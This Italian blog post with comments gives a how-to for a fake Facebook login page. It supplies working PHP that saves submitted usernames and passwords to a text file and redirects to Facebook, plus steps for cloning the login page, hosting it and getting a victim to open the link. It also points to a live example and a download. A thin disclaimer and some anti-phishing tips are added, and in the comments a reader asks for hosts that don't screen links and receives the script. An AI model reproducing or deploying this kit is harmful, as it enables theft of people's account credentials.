Fake login da remoto con un server FTP
Facebook è sicuramente il social network più famoso, ma è anche quello meno sicuro. Infatti di default i pacchetti che viaggiano tra il PC e i server in California non viaggiano in HTTPS, ma semplicemente in HTTP. Questo “insicurezza” la si può facilmente notare con programmi come Faceniff, che permettono di intercettare i cookie del dispositivo del malcapitato di turno e sarà possibile entrare nella sua via “virtuale”. Un altro metodo che mette in pericolo Facebook è il fake login. Esso non è altro che un metodo di rubare, ovviamente illegalmente, le password, attraverso la creazione di pagina simile a quella originale, in cui la vittima inserisci il nome utente e la password, che però vengono salvati in file, che il criminale di turno più leggere e quindi scovare le credenziali d’accesso. La guida che sta per seguire è volta solamente è dimostrare su come sia facile effettuare un fake login e non si incentiva nessuno ad utilizzare per rubare le password di amici, poichè un reato penale perseguibile dalle legge.
Come creare un fake login per Facebook
Il primo passo è quello di scaricare da internet un file contenente una copia della struttura della pagina di Facebook. Per esempio da questo link. Tuttavia, conviene crearsi da soli i file. Per farlo basta creare un file post.php con scritto:
<?php
header (‘Location:http://it-it.facebook.com/’);
$handle = fopen(“leggimi.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Per trovare la vera e propria struttura, occorre aprire la pagina di login di Facebook e attraverso, per esempio Google Chrome, copiarsi la pagina e salvare il file in index.html.
Ora occorre creasi uno spazio WEB. Per esempio si può usare utilizzare http://it.altervista.org/.
Una vota creato lo spazio web, occorre caricare i file in una cartella, per esempio facebook. Una volta effettuato il caricamento, basta “solo” cercare il modo di far aprire alla vittima il link che abbiamo creato. Un’esempio del risultato finale è http://francy700.altervista.org/facebook/index.html Ovviamente non inserite le password qui ! Per vedere le credenziali d’accesso, occorre aprire il file leggimi.txt, presente nella cartella che abbiamo creato precedentemente.
Consigli per non cadere in un fake login
- Diffidare di aprire link sospetti che provengono anche da Amici
- Controllare nella barra degli indirizzi che si stia effettivamente navigando sul sito di facebook
- Abilitare il protocollo HTTPS dalle impostazioni di Facebook
- Se sei sempre il 1.000.000 cliente nei banner, non pensare di essere così fortunato. Molto probabilmente è una truffa fatta per rubare le due credenziali.
- In caso di furti di password, cercare di cambiarla immediatamente e fare la denuncia alla polizia postale.
il link di prova che hai messo è stato bloccato,
hai altri siti dove magari non controllano molto i link?
Ho trovato questo link http://www.mediafire.com/?4ucdbd53147e8ek, contenente il file post.php. Per il file html, occorre seguire la guida che ho scritto.